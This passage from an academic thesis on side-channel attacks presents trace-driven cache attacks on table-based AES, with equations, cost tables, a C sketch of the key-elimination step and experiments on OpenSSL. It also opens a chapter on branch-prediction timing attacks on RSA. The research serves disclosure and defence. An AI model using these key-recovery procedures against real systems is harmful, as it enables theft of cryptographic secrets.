providing a lower probability bound for a correct guess in the full key space attack. Note that µ_A, µ_B, σ_A² ≈ σ_B², N, r determine ε, c and z0, which are yet unknown in real attacks since µ_A and µ_B are unknown. Example 1 gives an idea of the magnitude of r.

Example 1. Let m = 2^12, m′ = 2^32, and y0 := (z0 − µ_B)/σ_B = Φ^(−1)(c^(1/(m−1))). If c = 0.5 (resp., if c = 100/101) the number r = N′/N = 3.09 (resp., r = 3.85) gives Φ(y0·√r)^(u(m−1)) = Φ(y0)^(m−1) = 0.5 (resp., = 100/101).

5.6. Conclusion

We have presented a cache-based timing attack on AES software implementations. Our experiments indicate that cache attacks can be used to extract secret keys of remote systems if the system under attack runs on a server with a multitasking or multithreading system and a large enough workload. Although a large number of measurements is required to successfully perform a remote cache attack, it is feasible in principle. In this regard, we would like to point out the feasibility of such cache attacks to the public, and recommend implementing appropriate countermeasures. Several countermeasures [75, 14, 73, 76, 77, 19] have been proposed to prevent possible vulnerabilities and develop more secure systems.

6. TRACE-DRIVEN CACHE ATTACKS ON AES

There are various cache based side-channel attacks in the literature, which are discussed in detail in Chapter 4. Trace-driven attacks are one of the three types of cache based attacks that have been distinguished so far, c.f. Section 4.1. We present a trace-driven cache based attack on AES in this chapter. There are already two trace-driven attacks on AES in the literature [15, 62]. However, our attacks require significantly fewer measurements (e.g., only 5 measurements in some cases) and are much more efficient than the previous attacks. We show that trace-driven attacks have indeed much more power than what is stated in the previous studies. Furthermore, we present a robust computational model for trace-driven attacks that allows one to evaluate the cost of such attacks on a given implementation and platform. Although we only apply our model to a single attack on AES in this document, it can also be used for other symmetric ciphers like DES. The main contribution of our model to the field is that it can be used to quantitatively analyze the cost of trace-driven attacks on different implementations of a cipher. Therefore, we can analyze the effectiveness of various mitigations that can be used against such attacks.
Thus, a designer can use our model to determine which mitigations he needs to implement against trace-driven attacks to achieve a predetermined security level.

6.1. Overview of Trace-Driven Cache Attacks

In trace-driven attacks, the adversary is assumed to be able to capture the profile of the cache activity during an encryption. This profile includes the outcomes of every memory access the cipher issues in terms of cache hits and misses. Therefore, the adversary has the ability to observe whether a particular access to a lookup table yields a hit and can infer information about the lookup indices, which are key dependent. This ability gives an adversary the opportunity to make inferences about the secret key.

Trace-driven attacks on AES were first presented in [62, 15]. Bertoni et al. implemented a cache based power attack that exploits external collisions between different processes [15]. Their attack requires 256 power traces to reveal the secret AES key. Lauradoux's power attack exploits the internal collisions inside the cipher but only considers the first round AES accesses and can reduce the exhaustive search space of a 128-bit AES key to 80 bits. These attacks are described in more detail in Sections 4.2.7 and 4.2.8. We describe much more efficient trace-driven attacks on AES in this chapter. Our two-round attack is a known-plaintext attack and exploits the collisions among the first two rounds of AES. A more efficient version, which we call the last round attack, considers last round accesses and is a known-ciphertext attack.

In trace-driven cache attacks, the adversary obtains the traces of cache hits and misses for a sample of encryptions and recovers the secret key of a cryptosystem using this data. We define a trace as a sequence of cache hits and misses. For example, MHHM, HMHM, MMHM, HHMH, MMMM, and HHHH are examples of traces of length 4. Here H and M represent a cache hit and a cache miss, respectively. The first access in the first example is a miss, the second one is a hit, and so on. If an adversary captures such traces, he can determine whether a particular access during an encryption is a hit or a miss.

The trace of an encryption can be captured by the use of power consumption measurements, as done in [15, 62]. In this document, we do not get into the details of how to capture cache traces. We analyze trace-driven attacks on AES under the assumption that the adversary can capture the traces of AES encryption. This assumption corresponds to clean measurements in a noiseless environment. In reality, an adversary may have noise in the measurements in some circumstances, in which case the cost of the attack may increase depending on the amplitude of the noise. However, an analysis under the above assumption gives us a clearer understanding of the attack cost. The assumption of a noiseless environment also enables us to make a more reliable comparison of different attacks.

In a side-channel attack, there are essentially two different phases:

• Online Phase: consists of the collection of the side-channel information of the target cipher. This phase is also known as the sampling phase of the attack. The adversary encrypts or decrypts different input values and measures the side-channel information, e.g., power consumption or execution time of the device.

• Offline Phase: is also known as the analysis phase. In this phase, the adversary processes the data collected in the online phase and makes predictions and verifications regarding the secret value of the cipher.
An adversary usually performs the former phase completely before the latter one. However, in some cases, especially in adaptive chosen-text attacks (e.g. [21, 6]), these two phases may overlap and be performed simultaneously. We use two different metrics to evaluate the cost of our attacks. The first metric is the expected number of traces that we need to capture to narrow the search space of the AES key down to a certain degree. The second metric is the average number of operations we need to perform to analyze the captured traces and eliminate the wrong key assumptions. These metrics basically represent the costs of the online and offline phases of our attacks. As the reader can clearly see in this chapter, there is a trade-off between the costs of these two phases.

6.2. Trace-Driven Cache Attacks on the AES

In this chapter, we present trace-driven attacks on the most widely used implementation of AES, and estimate their costs. We assume that the cache does not contain any AES data prior to each encryption, because the captured traces cannot be accurate otherwise. Therefore, the adversary is assumed to clean the cache (e.g., by loading some garbage data, as done in [15, 100, 101, 73, 80]) before the encryption process starts. Another assumption we make is that the data in the AES lookup tables cannot be evicted from the cache during the encryption once it is loaded into the cache. This assumption means that each lookup table can only be stored in a different, non-overlapping location of the cache and that there is no context switch during an encryption nor any other process that runs simultaneously with the cipher and evicts the AES data. These assumptions hold if the cache is large enough, which is the case for most current processors. An adversary can also discard a trace if a context switch occurs during the measurement. We also assume that each measurement is composed of the cache trace of a single message block encryption. In this document, we only consider AES with 128-bit key and block sizes. Our attacks can easily be adapted to longer key and block sizes; however we omit these cases for the sake of simplicity.

The implementation we analyze is described in [31] and it is suitable for 32-bit architectures (c.f. Section 2.2.1). It employs 4 different lookup tables in the first 9 rounds and a different one in the last round. In this implementation, all of the component functions, except AddRoundKey, are combined into four different tables and the rounds turn out to be composed of table lookups and bitwise exclusive-or operations. In each round, except the last one, it makes 4 references to each of the first 4 tables. The S-box lookups in the final round are implemented as table lookups to another 1 KB table, called T4, with 256 32-bit elements. There are 16 accesses to T4 in that round. The indices of these accesses are S_i^10, where S_i^t is byte i of the intermediate state value that becomes the input of round t and i ∈ {0, ..., 15}. Let C be the ciphertext, i.e., the output of the last round, represented as an array of 16 bytes, C = (c0, c1, ..., c15). Individual bytes of C are computed as ci = Sbox[S_w^10] ⊕ RK_i^10, where RK_i^10 is the ith byte of the last round key and Sbox[S_w^10] is the S-box output for the input S_w^10 for a known w ∈ {0, 1, ..., 15}. The S-box in AES implements a permutation, and therefore its inverse, i.e., Sbox^(-1), exists.
6.2.1. Overview of an Ideal Two-Round Attack

The access indices in the first round are of the form Pi ⊕ Ki, where Pi and Ki are the ith bytes of the plaintext and the cipherkey, respectively, and i ∈ {0, 1, ..., 15}. The indices of the first 4 references to the first table, T0, are:

P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .

The outcome of the second access to T0, i.e., the one with the index P4 ⊕ K4, gives information about K0 and K4. For example, if the second access results in a cache hit, we can directly conclude that the index P4 ⊕ K4 has to be equal to the index of the first access, i.e., P0 ⊕ K0. If it is a cache miss, then these two indices must be different. We can use this fact to find the correct key byte difference K0 ⊕ K4:

P0 ⊕ K0 = P4 ⊕ K4  ⇒  K0 ⊕ K4 = P0 ⊕ P4
P0 ⊕ K0 ≠ P4 ⊕ K4  ⇒  K0 ⊕ K4 ≠ P0 ⊕ P4

In other words, if we capture a cache trace during the first round of AES and the second access to T0 results in a cache hit, then we can directly conclude that K0 ⊕ K4 = P0 ⊕ P4. Recall that the plaintext is assumed to be known to the attacker and the cache is clean prior to the first table lookup, so that the first access to a table always results in a cache miss. On the other hand, if we see a miss, then K0 ⊕ K4 cannot be equal to P0 ⊕ P4 and we can eliminate this wrong value. If we collect a sample of traces, we can find the correct value of K0 ⊕ K4 either by eliminating all possible wrong values or by directly finding the correct value when we observe a cache hit in the second access in any of the sampled traces. We can also find the other key byte differences Ki ⊕ Kj, where i, j ∈ {0, 4, 8, 12}, using the same idea. We can further reduce the search space by considering the accesses to the other three tables. In general, we can obtain Ki ⊕ K4*j+i, where i, j ∈ {0, 1, 2, 3}, and it is then enough to search only 32 bits to find the entire 128-bit key. A final search space of 32 bits is only a theoretical lower bound in the first round attack, due to the complications explained in Subsection 6.2.3. We also have to consider second round accesses to really reduce the search space to 32 bits. The first round attack only reveals some of the bits of Ki ⊕ Kj. However, when we examine the collisions between the first and second round accesses in the same way, i.e., in a 'two-round attack', we can reveal the entire AES key.

6.2.2. Overview of an Ideal Last Round Attack

Another way to find the cipherkey is to exploit the collisions between the last round accesses. The outcomes of the last round accesses to T4 leak information about the values of the last round key bytes, i.e., RK_i^10 where i ∈ {0, ..., 15}. The S-box lookups in the final round are implemented as table lookups to another 1 KB table, called T4, with 256 32-bit elements. Four repetitions of the same 8-bit Sbox element are concatenated to form the corresponding 32-bit element of T4. There are 16 accesses to T4 in that round. The indices of these accesses are S_w^10, where S_w^t is byte w of the intermediate state value that becomes the input of round t and w ∈ {0, ..., 15}. Let C be the ciphertext, i.e., the output of the last round, represented as an array of 16 bytes, C = (c0, c1, ..., c15). Individual bytes of C are computed as ci = Sbox[Ii] ⊕ RK_i^10, where RK_i^10 is the ith byte of the last round key, Sbox[Ii] is the S-box output for the input index Ii, and Ii = S_w^10 for known w, i ∈ {0, 1, ..., 15}.
Ii is equal to S_w^10 for known values of i and w, but the actual mapping between these variables is not relevant for our purposes. In this chapter, we present our attack under the assumption that the AES memory accesses in the last round are issued by the processor in a given order, i.e., first T4[I0], second T4[I1], etc. However, the actual order is implementation specific and may differ from our assumption. Our attack can easily be adapted to any given order without any performance loss. We also need to mention that the S-box in AES implements a permutation, and therefore its inverse, i.e., Sbox^(-1), exists.

The outcomes of the last round accesses to T4 leak information about the values of the last round key bytes, i.e., RK_i^10 where i ∈ {0, ..., 15}. For example, if the second access to T4 results in a cache hit, we can conclude that the indices I0 and I1 are equal. If it is a cache miss, then these values must be unequal. We can use this fact to find the correct round key bytes RK_0^10 and RK_1^10 as follows. We can write the value of Ii in terms of RK_i^10 and ci:

Ii = Sbox^(-1)[ci ⊕ RK_i^10] .

If I0 and I1 are equal, so are Sbox^(-1)[c0 ⊕ RK_0^10] and Sbox^(-1)[c1 ⊕ RK_1^10], which also mandates the equality of c0 ⊕ RK_0^10 and c1 ⊕ RK_1^10. This equality can also be written as

c0 ⊕ RK_0^10 = c1 ⊕ RK_1^10  ⇒  c0 ⊕ c1 = RK_0^10 ⊕ RK_1^10 .

Since the value of C is known to the attacker, RK_0^10 ⊕ RK_1^10 can directly be computed from the values of c0 and c1 if the second access to T4 results in a cache hit. In case of a cache miss, we can replace the = sign in the above equations with ≠ and use the inequalities to eliminate the values that cannot be the correct value of RK_0^10 ⊕ RK_1^10. The value of RK_2^10 relative to RK_0^10 can also be determined by analyzing the first three accesses to T4 after the correct value of RK_0^10 ⊕ RK_1^10 is found. Similarly, if we extend our focus to the first four accesses, we can find RK_3^10. Then we can find RK_4^10, and so on. In general, we can find all of the round key byte differences RK_i^10 ⊕ RK_j^10, where i, j ∈ {0, 1, ..., 15}. The value of any single byte RK_i^10 can be searched exhaustively to determine the entire round key. After revealing the entire round key, it becomes trivial to compute the actual secret key, because the key expansion of the AES cipher is a reversible function.
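The elimination step for the first pair of last round key bytes can be sketched as follows. The code is our own illustration of the procedure above, written for the ideal setting of this subsection: inv_sbox is assumed to be an inverse AES S-box table provided elsewhere, and the hit flag represents the outcome of the second T4 access extracted from one captured trace.

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

extern const uint8_t inv_sbox[256];     /* assumed inverse AES S-box table */

/* alive[a][b] is true while (RK0 = a, RK1 = b) is still a valid hypothesis. */
static bool alive[256][256];

void init_hypotheses(void)
{
    memset(alive, 1, sizeof(alive));    /* initially all 2^16 pairs are possible */
}

/* Process one trace: c0 and c1 are ciphertext bytes 0 and 1, and hit tells
   whether the second access to T4 was observed as a cache hit. */
void eliminate_pairs(uint8_t c0, uint8_t c1, bool hit)
{
    for (int rk0 = 0; rk0 < 256; rk0++) {
        for (int rk1 = 0; rk1 < 256; rk1++) {
            if (!alive[rk0][rk1])
                continue;
            /* In the ideal model, a hit occurs iff the two lookup indices
               I0 and I1 are identical under this hypothesis. */
            bool predicted_hit =
                (inv_sbox[c0 ^ rk0] == inv_sbox[c1 ^ rk1]);
            if (predicted_hit != hit)
                alive[rk0][rk1] = false;    /* contradicts the captured trace */
        }
    }
}

Feeding successive traces into eliminate_pairs() implements the first step of the attack; the later steps extend the same idea to triples, quadruples, and so on, reusing only the hypotheses that survived. In a real cache, the comparison is between the most significant parts of the two indices rather than the full bytes, as explained in the next subsection, but the loop structure stays the same.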
6.2.3. Complications in Reality and Actual Attack Scenarios

In a real environment, even if the index of the second access to a certain lookup table is different from the index of the first access, a cache hit may still occur. Any cache miss results in the transfer of an entire cache line, not only one element, from the main memory. Therefore, if a later access retrieves an element that lies in the same cache line as the previously accessed data, a cache hit will occur. Let δ be the number of bytes in a cache line and assume that each element of the table is k bytes long. In this situation, there are δ/k elements in each line, which means any access to a specific element will map to the same line as (δ/k − 1) other accesses. If two different accesses to the same array read the same cache line, the most significant parts of their indices, i.e., all of the bits except the last ℓ = log2(δ/k) bits, must be identical. Using this fact, we can find the difference of the most significant parts of the key bytes using the equation

⟨P0⟩ ⊕ ⟨P4⟩ = ⟨K0⟩ ⊕ ⟨K4⟩ ,

where ⟨A⟩ stands for the most significant part of A. Therefore, we can only reveal ⟨Ki ⊕ K4*j+i⟩, where i, j ∈ {0, 1, 2, 3}, using the collisions in the first round. Notice that (8 − ℓ) is the size, in bits, of the most significant part of a table lookup index, where ℓ = log2(δ/k). The first round attack allows us to reduce the search space by 12 * (8 − ℓ) bits. In theory ℓ can be as low as zero bits, in which case the search space becomes only 32 bits. The most common values of δ are 32 and 64 in widely used processors. For δ = 64 the search space is reduced by 48 bits, yielding an 80-bit final search space. This is the reason why we need to consider the second round indices along with the first round to achieve full key disclosure.

This complication affects the last round attack too. We observe a cache hit in the second access to T4 whenever

⟨S_0^10⟩ = ⟨S_5^10⟩ , and so ⟨Sbox^(-1)[c0 ⊕ RK_0^10]⟩ = ⟨Sbox^(-1)[c1 ⊕ RK_1^10]⟩ .

However, due to the nonlinearity of the AES S-box, only the correct RK_0^10 and RK_1^10 values obey the above equation for every ciphertext sample. Therefore, we need to find the correct RK_0^10 and RK_1^10 values instead of their difference. This increases the search space of this initial guessing problem from 8 bits to 16 bits. However, once we find these round key bytes, we only need to search through 8 bits to find each of the remaining round key bytes.

6.2.4. Further Details of Our Attacks

In this subsection we explain some details of our attacks that are not mentioned above. To be more precise, we explain the overall attack strategy and how to exploit second round accesses. We call the possible values that can be the correct value of a key byte (round key byte, respectively) the hypotheses of that particular key byte (round key byte, resp.), or shortly the key byte hypotheses (round key byte hypotheses, resp.). Incorrect values are called wrong hypotheses. Initially all 256 values, i.e., from 0x00 to 0xff, are considered as hypotheses for a particular key byte. During the course of the attack, we identify some of these values as wrong key byte hypotheses; thus the number of hypotheses decreases and the number of identified wrong hypotheses increases.

In our attacks, we consider each access to a lookup table separately, starting from the second one. The first access is always a miss because of the cache cleaning and the assumptions explained above. We use the last round attack as an example to explain the overall attack strategy. The outcome of the second access to T4 allows us to eliminate wrong key hypotheses for RK0 and RK1. After we find the correct values for these bytes, we extend our attack to the third access to find RK2, then to the fourth access to find RK3, and so on. Therefore, there are different steps in the attack, and each further step considers one more access than the previous step. Each step has a different set of wrong key hypotheses. It decreases the overall attack cost if we eliminate as many wrong key hypotheses in a step as possible before proceeding with the next attack step. For example, the first step of the last round attack examines the outcomes of the first two accesses to T4 in each captured trace in the sample and eliminates all of the possible RK0 and RK1 values that are determined to be wrong. The second step considers the third access to T4 and the remaining hypotheses for RK0 and RK1 and eliminates all of the (RK0, RK1, RK2) triples that cannot generate the captured traces.
The attack continues with the later steps, and only those key hypotheses that can generate the captured traces remain at the end. If we can capture a large enough sample, then we end up with only the correct key. If we have fewer traces, then more than one hypothesis remains at the end of the attack and we need to perform an exhaustive search on this reduced key set. Eliminating as many wrong key hypotheses as possible in earlier steps reduces the cost of the later ones and therefore the total cost of the attack. We eliminate all of the key hypotheses that do not obey the captured trace in each step. In this sense, our decision strategy is optimal, because it eliminates the maximum possible number of hypotheses.

The two-round attack is slightly different from this scheme. There are four different lookup tables used in the first two rounds of AES. Therefore, a single step of the two-round attack considers four more accesses than the previous step, i.e., the next unexamined access to each of the four tables. For example, the first step considers the first 8 accesses in the first round. These 8 accesses consist of two accesses to each of the four tables. The next step considers the first 12 accesses, and so on.

We also want to give more details of the two-round attack, especially the second round part, in this subsection. Using the guesses from the first round, a similar guessing procedure can be derived in the second round in order to obtain further key bits. We describe a possible attack that uses only accesses to T1, i.e., the second table. Recall that the AES implementation we work on uses 5 different tables with 256 entries each. Let ∆i represent Pi ⊕ Ki. The index of the first access to T1 in the second round is:

Sbox(∆4) ⊕ 2 • Sbox(∆9) ⊕ 3 • Sbox(∆14) ⊕ Sbox(∆3) ⊕ Sbox(K14) ⊕ K1 ⊕ K5 .

Here Sbox(x) stands for the result of an AES S-box lookup with the input value x and • is the finite field multiplication used in AES. Using only the first 5 accesses to T1, i.e., up to the fourth step of the two-round attack, and searching through K3, K4, K9, and K14, we can recover these four bytes. This guessing problem has a key space of 2^32. Notice that we can already recover ⟨K1 ⊕ K5⟩ in the first round attack. The indices of the first accesses to each of the lookup tables in the second round are functions of different key bytes, and these functions span each of the 16 key bytes. Hence, we can recover the entire key by analyzing only the outcomes of the first 5 accesses to each of the four tables, i.e., a total of 20 accesses. Although knowing only the outcomes of the first 5 accesses is sufficient to recover the key, extending the attack by taking advantage of further accesses reduces the number of required traces. We want to mention that only the accesses of the first two rounds can be used in such a known-plaintext attack. The reason is the full avalanche effect: starting from the third round, the indices become functions of the entire key, making an exhaustive search as efficient as our attack.

6.3. Analysis of the Attacks

In this section we estimate the number of traces that need to be captured to recover the secret key. In other words, we determine the cost of the attacks presented above. In the following subsections, we first present a computational model that allows us to determine the cost of trace-driven attacks and then we use this model to perform the cost analysis of the proposed attacks. The accuracy of our model has been verified experimentally.
6.3.1. Our Model

Let $m$ be $2^{(8-\ell)}$, i.e., the number of blocks in a table. A block of a table is defined as a set of table elements that are stored together in a single cache line. The cost of a trace-driven attack is a function of $m$. The two most common values of $m$ are 16 and 32 today, and thus we evaluate the cost of the attacks for these two values of $m$. In order to calculate the expected number of traces, we first need an equation that gives us the expected number of table blocks that are loaded into the cache after the first $k$ accesses. We denote this expected number by $\#_k$. The probability that a single table block is not loaded into the cache after $k$ accesses to this table is $(\frac{m-1}{m})^k$. The expected number of blocks that are not loaded therefore becomes $m \cdot (\frac{m-1}{m})^k$, and hence
$$\#_k = m - m \cdot \left(\frac{m-1}{m}\right)^k .$$
Let $R^k_{expected}$ be the expected fraction of the wrong key hypotheses that obey the captured trace in the $k$th step of the attack. In other words, a wrong key hypothesis that generated the same trace as the correct key in the first $k$ accesses of an encryption generates the captured outcome in the next step with a probability of $R^k_{expected}$. Therefore, if the adversary captures the outcomes of the first $(k+1)$ accesses ($1 \le k \le 15$) to T4 during a single encryption, he can eliminate a $(1 - R^k_{expected})$ fraction of the wrong key hypotheses in the $k$th step of the attack, where
$$R^k_{expected} = \frac{\#_k}{m} \cdot \frac{\#_k}{m} + \left(1 - \frac{\#_k}{m}\right) \cdot \left(1 - \frac{\#_k}{m}\right) , \quad 1 \le k \le 15 .$$
Notice that $R^k_{expected}$ is not the $k$th power of a constant $R_{expected}$ here, but a quantity parameterized by $k$. The left (right) term of the above summation is the product of the probability of a cache hit (miss, resp.) and the expected ratio of the wrong hypotheses that remain after eliminating the ones that do not cause a hit (miss, resp.). Figure 6.1 shows the values of $R^k_{expected}$ and $\#_k$ for different values of $k$ and $m$. We want to mention again that these values are experimentally verified: the differences between the calculated and empirical values of $R^k_{expected}$ are less than 0.2% on average. We can use these values to find the expected number of remaining wrong key hypotheses after $t$ measurements, the expected number of measurements needed to reduce the key space down to a specific size, or in any such calculations.

6.3.2. Trade-off Between Online and Offline Cost

There is an obvious trade-off between the online and offline cost of the attacks. If an adversary can capture a higher number of traces, it becomes easier to find the key. Eliminating more wrong hypotheses in early steps reduces the cost of the later steps. The change in the offline cost of the attacks with the number of captured traces can be seen in Figures 6.2 and 6.3. As shown in Figure 6.3, the last round attack requires only 5 measurements to reduce the computational effort of breaking the entire 128-bit key below the recommended minimum security levels (c.f. [30]). NSA and NIST recommend a minimum key length of 80 bits for symmetric ciphers, so that the computational effort of an exhaustive search should not be lower than $2^{80}$.
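As a concrete check of the model of Subsection 6.3.1, the following short C program (our own illustration) evaluates the two formulas above for m = 16 and m = 32; its output reproduces the values tabulated in Figure 6.1.

```c
/* Sketch: evaluating #k and R_expected^k for the two common block counts. */
#include <stdio.h>
#include <math.h>

int main(void) {
    int ms[2] = {32, 16};
    for (int i = 0; i < 2; i++) {
        double m = ms[i];
        printf("m = %.0f\n  k    R_expected^k       #k\n", m);
        for (int k = 1; k <= 15; k++) {
            double nk = m - m * pow((m - 1.0) / m, k); /* expected number of loaded blocks */
            double p_hit = nk / m;                     /* probability that the (k+1)-th access hits */
            double r = p_hit * p_hit + (1.0 - p_hit) * (1.0 - p_hit); /* surviving fraction of wrong hypotheses */
            printf("%3d     %.6f      %.6f\n", k, r, nk);
        }
    }
    return 0;
}
```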
              m = 32                        m = 16
  k     R^k_expected      #_k        R^k_expected      #_k
  1      0.939453       1.000000      0.882813       1.000000
  2      0.884523       1.968750      0.787140       1.937500
  3      0.834806       2.907227      0.709919       2.816406
  4      0.789923       3.816376      0.648487       3.640381
  5      0.749522       4.697114      0.600528       4.412857
  6      0.713273       5.550329      0.564035       5.137053
  7      0.680868       6.376881      0.537265       5.815988
  8      0.652021       7.177604      0.518709       6.452488
  9      0.626464       7.953304      0.507063       7.049208
 10      0.603946       8.704763      0.501197       7.608632
 11      0.584236       9.432739      0.500138       8.133093
 12      0.567116      10.137966      0.503050       8.624775
 13      0.552384      10.821155      0.509209       9.085726
 14      0.539850      11.482994      0.517999       9.517868
 15      0.529340      12.124150      0.528890       9.923002

FIGURE 6.1. The calculated values of #_k and R^k_expected for different values of m.

              m = 16                           m = 32
  Number of traces   Cost ≈         Number of traces   Cost ≈
        15           2^48.43              30           2^36.83
        20           2^39.09              35           2^35.27
        25           2^34.74              40           2^34.61
        30           2^33.68              45           2^34.36
        35           2^33.53              50           2^34.28
       ≥40          < 2^33.50            ≥55          < 2^34.26

FIGURE 6.2. The cost analysis results of the two-round attack.

              m = 16                           m = 32
  Number of traces   Cost ≈         Number of traces   Cost ≈
         1           2^117.68              1           2^120.93
         5           2^74.51               5           2^90.76
        10           2^35.12              10           2^56.16
        20           2^24.22              20           2^33.97
        30           2^21.36              30           2^27.77
        40           2^20.08              40           2^24.88
        50           2^19.46              50           2^23.25
        75           2^19.13              75           2^21.22
       100           2^19.12             100           2^20.39

FIGURE 6.3. The cost analysis results of the last round attack.

6.4. Experimental Details

We performed experiments to test the validity of the values we have presented above. The results show a very close correlation between our models and the empirical results, which confirms the validity of the models and calculations. Bertoni et al. showed that cache traces can be captured by measuring power consumption [15]. In our experimental setup, we did not measure the power consumption; instead we assumed the correctness of their argument. We simply modified the AES source code of OpenSSL [71], which is arguably the most widely used open source cryptographic library. The purpose of our modifications was not to alter the execution flow of the cipher, but to store the values of the access indices. These index values were then used to generate the cache traces. This process allowed us to capture the traces and obtain the empirical results. The average difference between the empirical and calculated values of $R^k_{expected}$, i.e., the error rate, is less than 0.2%. We believe this shows enough accuracy to validate our model. We generated one million randomly chosen cipher keys and encrypted 100 random plaintexts under each of these keys. In other words, we performed the last round attack steps with 100 random plaintexts. After each encryption, we determined the ratio of the number of remaining wrong key hypotheses to the number of wrong key hypotheses that were present before the encryption. We call this ratio the reduction ratio; it corresponds to $R^k_{expected}$ in our model. We calculated the average of these measured values. Our results show a very close correlation between the measured and calculated values. The calculated $R^k_{expected}$ values are given in Subsection 6.3.1.

6.5. Conclusion

We have presented trace-driven cache attacks on the most widely used software implementation of the AES cryptosystem. We have also developed a mathematical model, the accuracy of which is experimentally verified, to evaluate the cost of the proposed attacks. We have analyzed the cost using two different metrics, each of which represents the cost of a different phase of the attack. Our analysis shows that such trace-driven attacks are very efficient and require a very low number of encryptions to reveal the secret key of the cipher.
To be more specific, an adversary can reduce the strength of the 128-bit AES cipher below the recommended minimum security level by capturing the traces of only 5 encryptions. Having more traces reduces the total cost of the attack significantly. Our results also show this trade-off between the online and offline cost of the attack in detail.

7. PREDICTING SECRET KEYS VIA BRANCH PREDICTION

The contradictory requirements of increased clock-speed and decreased power-consumption for today's computer architectures make branch predictors an inevitable central CPU ingredient, which significantly determines the so called Performance per Watt measure of a high-end CPU, c.f. [41]. Thus, it is not surprising that there has been vibrant and very practical research on more and more sophisticated branch prediction mechanisms, c.f. [78, 91, 92]. Unfortunately, the present document identifies branch prediction as a novel and unforeseen security risk, even in the presence of recent security promises for commodity platforms from the Trusted Computing area. Indeed, although even the most recently found security risks for x86-based CPUs have been implicitly pointed out in the old but thorough x86-architecture security analysis, c.f. [95], we have not been able to find any hint in the literature spotting branch prediction as an obvious side channel attack victim. Let us elaborate a little bit on this connection between side-channel attacks and modern computer-architecture ingredients. So far, typical targets of side-channel attacks have mainly been smart cards, c.f. [28, 59]. This is due to the ease of applying such attacks to smart cards. The measurements of side-channel information on smart cards are almost "noiseless", which makes such attacks very practical. On the other hand, there are many factors that affect such measurements on real commodity computer systems based upon the most successful architecture, the Intel x86, c.f. [91]. These factors create noise, and therefore it is much more difficult to develop and perform successful attacks on such "real" computers within our daily life. Thus, until very recently, such side-channel attacks were not "really" considered harmful to these systems, even to those running on servers. This changed with the work of Brumley and Boneh, c.f. [21] and Chapter 3, who demonstrated a remote timing attack over a real local network. They simply adapted the attack principle introduced in [85] to show that the RSA implementation of OpenSSL [71] — the most widely used open source crypto library — was not immune to such attacks. Even more recently, we have seen an increased research effort on the security analysis of daily life PC platforms from the side-channel point of view. Here, it has especially been shown that the cache architecture of modern CPUs creates a significant security risk (c.f. [5, 14, 72, 73, 80] and Chapters 4, 5, and 6), which comes in different forms. Although the cache itself has long been known to be a crucial security risk of modern CPUs, c.f. [95, 48], the above papers were the first to prove such vulnerabilities practically and they raised large public interest in such vulnerabilities. Especially in the light of ongoing Trusted Computing efforts, c.f. [99], which promise to turn the commodity PC platform into a trustworthy platform, c.f. also [25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC platforms are of particular interest.
This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far. Even more interesting is the fact that all of the above pure software side channel attacks also allow a totally unprivileged process to attack other processes running in parallel on the same processor (or even remotely), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization. This particularly means that side channel attacks render all of the sophisticated protection mechanisms described, e.g., in [42, 103] useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks simply exploit deeper processor ingredients — i.e., below the trust architecture boundary, c.f. [81, 42]. Having said all this, it is natural to identify other modern computer architecture ingredients which have not yet been discovered as a security risk and which operate below the current trust architecture boundaries. That is the focus of the present and the next chapters — a processor's Branch Prediction Unit (BPU). More precisely, we analyze BPUs and highlight the security vulnerabilities associated with their opaque operations deep inside a processor. In other words, we present so called branch prediction attacks on simple RSA implementations as a case study to describe the basics of the novel attacks an adversary can use to compromise the security of a platform. Our attacks can also be adapted to other RSA implementations and/or other public-key systems like ECC. We try to refer to specific vulnerable implementations throughout this text.

7.1. Outlines of Various Attack Principles

We gradually develop 4 different attack principles in this section. Although we describe these attacks on a simple RSA implementation, the underlying ideas can be used to develop similar attacks on different implementations of RSA and/or on other ciphers based upon ECC. In order to do so, we assume that an adversary knows every detail of the BPU architecture as well as the implementation details of the cipher (Kerckhoffs' Principle). This is indeed a valid assumption as the BPU details can be extracted using some simple benchmarks like the ones given in [65].

7.1.1. Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack)

In this attack, we rely on the fact that the prediction algorithms are deterministic, i.e., the prediction algorithms are predictable. We present a simple attack below, which demonstrates the basic idea behind this attack. The presented attack is a modified version of Dhem et al.'s attack [34]. Assume that the RSA implementation employs Square-and-Multiply exponentiation and Montgomery Multiplication (MM). Assume also that an adversary knows the first i bits of d and is trying to reveal $d_i$. For any message m, he can simulate the first i steps of the operation and obtain the intermediate result that will be the input of the (i + 1)th squaring. Then, the attacker creates 4 different sets M1, M2, M3, and M4, where

M1 = {m | m causes a misprediction during the MM of the (i + 1)th squaring if $d_i$ = 1}
M2 = {m | m does not cause a misprediction during the MM of the (i + 1)th squaring if $d_i$ = 1}
M3 = {m | m causes a misprediction during the MM of the (i + 1)th squaring if $d_i$ = 0}
M4 = {m | m does not cause a misprediction during the MM of the (i + 1)th squaring if $d_i$ = 0}.
If the difference between the timing characteristics, e.g., the average execution times, of M1 and M2 is more significant than that of M3 and M4, then he guesses that $d_i = 1$. Otherwise $d_i$ is guessed to be 0. To express the above idea more mathematically, we define:

• An Assumption $A^i_t$: $d_i = t$, where $t \in \{0, 1\}$.

• A Predicate $P : m \rightarrow \{0, 1\}$ with
$$P(m) = \begin{cases} 1 & \text{if a misprediction occurs during the computation of } m^2 \bmod N \\ 0 & \text{otherwise.} \end{cases}$$

• An Oracle $O_t : (m, i) \rightarrow \{0, 1\}$ under the assumption $A^i_t$:
$$O_t(m, i) = \begin{cases} 1 & \text{if } P(m_{temp}) = 1 \\ 0 & \text{if } P(m_{temp}) = 0, \end{cases}$$
where $m_{temp} = m^{(d_0, d_1, \ldots, d_{i-1}, t)_2} \bmod N$.

• A Separation $S^i_t$ under the assumption $A^i_t$:
$$S^i_t = (S^i_0, S^i_1) = (\{m \mid O_t(m, i) = 0\}, \{m \mid O_t(m, i) = 1\}).$$

